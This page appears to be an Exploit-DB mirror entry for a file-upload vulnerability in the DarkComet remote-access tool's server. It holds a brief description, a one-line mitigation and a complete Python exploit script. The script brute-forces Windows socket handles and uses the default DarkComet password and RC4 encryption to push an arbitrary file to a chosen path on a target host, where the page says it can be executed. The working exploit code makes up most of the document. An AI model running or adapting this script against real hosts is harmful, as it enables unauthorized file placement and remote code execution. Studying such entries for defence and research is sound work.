header-logo
Suggest Exploit
vendor:
DarkComet Server
by:
PseudoLaboratories
8.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: DarkComet Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2020

DarkComet Server File Upload Vulnerability

This exploit allows an attacker to upload arbitrary files to a vulnerable DarkComet server. The vulnerability exists in the way the server handles file uploads. The attacker can use the ‘FILETRANSFER’ command to upload a malicious file to the server, which can then be executed remotely. The exploit is written in Python and uses the Crypto.Cipher library to encrypt and decrypt data sent to and from the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the server is running the latest version of DarkComet and that all security patches are applied.
Source

Exploit-DB raw data:

#!/usr/bin/env python3
#
# EDB Note: Source ~ https://gist.github.com/PseudoLaboratories/260b6f24844785aacc1e2fb61dd05c01/259944bd94a0d289ef80b9138c1e3f97a97aa9cd
#

from time import sleep
from socket import socket, AF_INET, SOCK_STREAM, error
from re import search
from Crypto.Cipher import ARC4
from binascii import hexlify, unhexlify

import argparse

def good(text):
    print('[+] ' + text)

def bad(text):
    print('[-] ' + text)

def normal(text):
    print('[*] ' + text)

def decrypt(data, key):
    return ARC4.new(key).decrypt(unhexlify(data)).upper()

def encrypt(data, key):
    return hexlify(ARC4.new(key).encrypt(data)).upper()

def upload(domain, port, key, local, remote, test):
    remote = remote.replace('\\', '/')
    f = open(local, "rb")
    client = socket(AF_INET, SOCK_STREAM)
    client.settimeout(5.0)
    client.connect((domain, port))
    try:
        idtype = decrypt(client.recv(12), key)
        if idtype != b'IDTYPE':
            bad('Key seems to be wrong!')
            return

        filetransfer = encrypt('FILETRANSFER111|%s' % test, key)
        client.send(filetransfer)
        client.recv(3)
        client.send(b'FILEBOF' + remote.encode('utf-8') + b'|111')
        client.recv(1)
        content = f.read()
        current = 0
        while (current + 1024) < len(content):
            current += client.send(content[current:current+1024])
            client.recv(1)
        client.send(content[current:len(content)])
        client.recv(1)
        client.send(b'FILEEOF')
        client.recv(1)
        client.send(b'FILEEND')
        client.close()
        return True
    except error as e:
        client.close()
    return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='bruteforce socket handle and upload arbitrary files to DarkComet servers')
    parser.add_argument('--port', '-p', dest='port', type=int, default=1604, help='port of the DarkComet server')
    parser.add_argument('--key', '-k', dest='key', default='#KCMDDC51#-890', help='password of the DarkComet server')
    parser.add_argument('--start', '-s', dest='start', type=int, default=0)
    parser.add_argument('--end', '-e', dest='end', type=int, default=2400)

    parser.add_argument('domain', help='domain name/ip of the DarkComet server')
    parser.add_argument('local', help='file name of the local file')
    parser.add_argument('remote', help='remote relative file path')

    args = parser.parse_args()

    for i in range(args.start, args.end, 4):
        # Increment by 4 because Windows seems to only
        # generate socket handles that are multiples of 4
        normal('Trying ' + str(i))
        if upload(args.domain, args.port, args.key, args.local, args.remote, i):
            good('Uploaded successfully!')
            break
        sleep(2)